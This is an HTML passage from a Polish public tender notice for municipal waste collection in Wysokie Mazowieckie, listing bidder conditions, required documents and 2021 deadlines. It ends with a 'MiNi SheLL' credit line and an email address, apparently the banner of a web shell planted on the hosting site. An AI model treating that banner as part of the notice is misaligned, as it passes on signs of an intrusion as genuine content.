w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego w niniejszym rozdziale warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym;<br/>Zamawiający nie wymaga spełnienia warunku<br/>2)	uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej , o ile wynika to z odrębnych przepisów:<br/>- Wykonawca musi być wpisany do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Miasta Wysokie Mazowieckie, prowadzonym przez Burmistrza Miasta Wysokie Mazowieckie ;<br/>- Wykonawca musi posiadać wpis do rejestru w bazie danych o produktach i opakowaniach oraz o gospodarce odpadami (BDO) jako transportujący;<br/>- Wykonawca musi posiadać aktualne zezwolenie w zakresie zbierania odpadów w myśl przepisów ustawy z dnia 14 grudnia 2012r. o odpadach;<br/>- Wykonawca musi posiadać wpis do rejestru podmiotów zbierających zużyty sprzęt elektryczny i elektroniczny, prowadzony zgodnie z ustawą o zużytym sprzęcie elektrycznym i elektronicznym.<br/>3)	sytuacji ekonomicznej lub finansowej,<br/>Zamawiający określa, że ww. warunek zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną min. 500 000,00 zł. <br/>4)	zdolności technicznej lub zawodowej. <br/>- Wykonawca winien wykazać, że wykonał w okresie ostatnich trzech lat (jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie): usługi odbioru odpadów komunalnych zmieszanych od właścicieli nieruchomości w ilości co najmniej 1.000 Mg/rok (w jednym lub wielu zadaniach) oraz usługi odbioru odpadów komunalnych gromadzonych selektywnie od właścicieli nieruchomości (w jednym lub wielu zadaniach) w ilości co najmniej 45 Mg/rok-z podaniem przedmiotu, daty wykonania i podmiotów, na rzecz których usługi były wykonane oraz załączeniem dowodów potwierdzających, że zostały wykonane lub są wykonywane należycie;<br/>- Dysponuje, lub będzie dysponował do dnia zawarcia umowy, obiektem, który może pełnić funkcję punktu selektywnej zbiórki odpadów komunalnych (PSZOK) i spełnia następujące wymagania: <br/>•	jest zlokalizowany na terenie Miasta Wysokie Mazowieckie na terenie przeznaczonym w miejscowym planie zagospodarowania przestrzennego pod usługi lub działką przemysłowo-usługową, w miejscu łatwo dostępnym (z możliwością parkowania pojazdów) dla wszystkich mieszkańców Miasta a wykonawca posiada prawo do dysponowania tą nieruchomością ( co najmniej na czas trwania umowy);<br/>•	jest ogrodzony, oświetlony, dozorowany, wyposażony w monitoring, o nawierzchni utwardzonej, z pomieszczeniem biurowym oraz socjalnym odpowiadającym liczbie zatrudnionych osób, wyposażony w: kontenery/pojemniki lub wydzielone segmenty do oddzielnego gromadzenia każdego rodzaju zbieranych selektywnie odpadów, wagę towarową z ważną legalizacją, kontenery/pojemniki przeznaczone na odpady wrażliwe na warunki atmosferyczne powinny znajdować się pod zadaszeniem, okaże Zamawiającemu, przed zawarciem umowy, dokument potwierdzający prawo do dysponowania nieruchomością dotyczącą przedmiotowego PSZOK;<br/>- Dysponuje bazą magazynowo- transportową usytuowaną na terenie Miasta Wysokie Mazowieckie lub w odległości nie większej niż 40 km od jego granicy; do której posiada tytuł prawny, spełniającą wymagania określone w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości;<br/>- Dysponuje:<br/>•	co najmniej dwoma pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych oraz <br/>•	co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych oraz<br/>•	co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktującej, spełniającymi wymagania określone w rozporządzeniu Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości;<br/>Zamawiający wymaga aby wymienione pojazdy spełniały normę emisji spalin Euro4. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	aktualne na dzień składania ofert oświadczenia , zawierające w szczególności informacje o tym, że Wykonawca nie podlega wykluczeniu z powodów wskazanych w Rozdziale XI SWZ, wg. wzoru stanowiącego Załącznik nr 2 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu Wykazania spełnienia warunku dotyczącego posiadania kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów, Wykonawca składa: <br/>- Wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów oświadczenie wykonawcy ( zał. 4 do SWZ) ; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;<br/>- Wykaz urządzeń technicznych oraz bazy magazynowo- transportowej, dostępnych wykonawcy usług w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami (zał. nr 5a i 5b do SWZ);<br/>- Dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;<br/>- Zaświadczenie potwierdzające wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości na terenie Miasta Wysokie Mazowieckie, wydane przez Burmistrza Miasta Wysokie Mazowieckie;<br/>- aktualne zezwolenie na prowadzenie działalności w zakresie zbierania odpadów wydane na podstawie ustawy o odpadach;<br/>- dokument nadania nr rejestrowego w BDO.<br/>Szczegółowo wymagania opisano w SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.	Wykonawca zobowiązany jest złożyć wraz z ofertą następujące oświadczenia:<br/>1)	aktualne na dzień składania ofert oświadczenia , zawierające w szczególności informacje:<br/>a) o tym, że Wykonawca spełnia warunki udziału w postępowaniu określone przez Zamawiającego w Rozdziale X SWZ - wg. wzoru stanowiącego Załącznik nr 3 do SWZ<br/>b) o tym, że Wykonawca nie podlega wykluczeniu z powodów wskazanych w Rozdziale XI SWZ, wg. wzoru stanowiącego Załącznik nr 2 do SWZ<br/>2)	zobowiązanie podmiotu udostępniającego wykonawcy zasoby na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w przypadku wykonawcy, który wykazując spełnienie warunków udziału w postepowaniu, polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, o tym, których warunków dotyczą udostępniane przez inne podmioty zasoby, – w takiej sytuacji należy złożyć wraz z ofertą załącznik nr 6<br/>3)	oświadczenia o których mowa w pkt 1 ppkt 1 podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby - w przypadku polegania wykonawcy na zdolnościach lub sytuacji podmiotów udostępniających zasoby w celu wykazania spełniania warunków udziału w postępowaniu,<br/>4)	oświadczenia o którym mowa w pkt 1 ppkt 1 podwykonawcy niebędącego podmiotem udostępniającym zasoby, potwierdzające brak podstaw wykluczenia tego podwykonawcy - w przypadku, gdy wykonawca w oświadczeniu wskazał nazwę podwykonawcy.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o którym mowa w pkt 1 ppkt 1, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>3.	Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt 1 ppkt 2, potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia potwierdzające brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość dokonania zmian Ceny w umowie w przypadku zmiany:<br/>•	stawki podatku od towarów i usług oraz podatku akcyzowego,<br/>•	wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym wynagrodzeniu za pracę,<br/>•	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>•	zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (Dz. U. poz. 2215 oraz z 2019 r. poz. 1074 i 1572) <br/>•	jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez wykonawcę<br/>2.	Zmiany ustawowej stawki VAT w okresie realizacji umowy – dotyczą wynagrodzenia za dostawy, których nie zafakturowano na dzień wejścia w życie przepisów o zmianie VAT. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-10 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">za pośrednictwem ePUAPu https://epuap.gov.pl/wps/portal, przy użyciu Formularza do złożenia, zmiany, wycofania oferty lub wniosku.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-10 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com